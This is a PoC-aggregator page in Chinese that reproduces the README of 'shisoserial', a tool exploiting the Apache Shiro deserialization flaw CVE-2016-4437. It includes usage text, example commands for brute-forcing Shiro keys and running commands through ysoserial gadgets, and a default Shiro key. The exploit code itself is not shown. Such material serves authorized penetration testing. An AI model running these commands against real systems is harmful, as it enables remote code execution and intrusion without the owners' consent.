POC详情: 101c975590469f4c55bfa3aa688f97218078e884

来源
关联漏洞
标题: Apache Shiro 信息泄露漏洞 (CVE-2016-4437)
描述:Apache Shiro是美国阿帕奇(Apache)软件基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。 Apache Shiro 1.2.5之前版本中存在安全漏洞。当程序没有为remember功能配置加密密钥时,远程攻击者可借助请求参数利用该漏洞执行任意代码,或绕过既定的访问限制。
描述
一个针对shiro反序列化漏洞(CVE-2016-4437)的快速利用工具/A simple tool targeted at shiro framework attacks with ysoserial.
介绍


# shisoserial

[English Document](https://github.com/4nth0ny1130/shisoserial/blob/master/README-EN.md)

## 这是什么?

一个针对shiro反序列化漏洞(CVE-2016-4437)的快速利用工具

## 贡献者

[4nth0ny](https://github.com/4nth0ny1130) @星期五实验室

欢迎提issues/pr

:)

## 环境

*   python 3.x

*   JDK 1.8

## 安装

```
python3 -m pip install -r requirements.txt
```

for `AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM'` or `No module named 'Crypto'`

```
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome
```

## 用法

```
usage: shisoserial.py [-h] --mode MODE --url  [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]

This is a simple tool to attack framework shiro with ysoserial

optional arguments:
  -h, --help            show this help message and exit
  --mode MODE, -m MODE  check/crack/yso/echo/encode
  --url , -u            Target URL address or the file containing the target URL
  --type default:CBC, -t default:CBC
                        Cipher Type, GCM or CBC
  --data , -d           Using this parameter will make HTTP request with POST method
  --key , -k            Specify a Shiro Key or will use dictionary brute force cracking
  --gadget , -g         Specific Ysoserial Gadget
  --command default:whoami, -c default:whoami
                        Specific Execute Command
  --proxies , -p        Specific Proxy
  --ser , -s            Specific serialize file name
  --thread , -T         Specific the number of threads
```

## 例子

### 检查目标是否使用shiro框架(使用默认CBC加密)

```
python3 shisoserial.py -m check -u http://127.0.0.1:8080
```

![](README.assets/1.png)

### 使用代理和CBC加密爆破目标shiro key

```
python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/
```

![](README.assets/2.jpg)

### 使用CommonsCollectionsK1利用链执行命令并获取命令执行结果

```
python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id
```

![](README.assets/3.png)

### 使用Post请求批量验证指定的shiro key

```
python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1
```

![image-20211229223405240](README.assets/4.jpg)

### 使用序列化数据文件构造payload并使用多线程批量发送

```
python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4
```

![image-20211230181021173](README.assets/5.jpg)

## 免责声明

本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
文件快照

[4.0K] /data/pocs/101c975590469f4c55bfa3aa688f97218078e884 ├── [4.0K] lib │   └── [3.1K] shiro_keys.txt ├── [4.0K] README.assets │   ├── [136K] 1.png │   ├── [179K] 2.jpg │   ├── [270K] 3.png │   ├── [336K] 4.jpg │   └── [330K] 5.jpg ├── [2.8K] README-EN.md ├── [3.1K] README.md ├── [ 85] requirements.txt ├── [ 57K] shisoserial.py └── [ 57M] ysoserial.jar 2 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。